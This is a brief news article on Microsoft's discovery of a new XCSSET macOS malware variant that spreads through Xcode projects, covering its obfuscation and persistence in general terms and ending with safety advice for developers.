Microsoft has identified a new macOS malware that was found in Xcode projects in the wild, and notably, it is a variant of the existing XCSSET malware, but with new abilities.

The Microsoft Threat Intelligence team wrote on X that this is the first known variant since 2022. This malware features improved obfuscation techniques, updated persistence mechanisms, and new infection strategies, all of which suggest it is a more advanced and capable form of malware with greater potential to cause harm. These new capabilities add to its already sophisticated features, such as being able to target digital wallets, extracting data from the Notes app, and accessing system information files.

What you need to know about the latest XCSSET malware variant

Microsoft reported on X that this new variant has better obfuscation techniques, utilising a more randomised approach for generating payloads within Xcode projects. In fact, both its encoding technique and the number of encoding iterations are randomised.

Additionally, Microsoft noted that this variant incorporates Base64 encoding alongside the older XXD hex dump method for encoding. Simply put, this makes it significantly harder to determine the malware’s intent and functionality.

The Microsoft Threat Intelligence team also explained that the malware ensures every time the Launchpad is started, both it and a malicious payload are executed. Furthermore, new infection techniques have been introduced, including new methods for placing payloads within targeted Xcode projects.

What should users do to stay safe?

As a precaution, the Microsoft Threat Intelligence team advises users to inspect and verify any Xcode projects they download or clone from online repositories considering that this malware primarily spreads through infected projects.

A general rule of thumb is to only download and install software from trusted sources and official app stores. Microsoft also confirmed that Microsoft Defender for Endpoint on Mac can detect XCSSET, including this new variant.

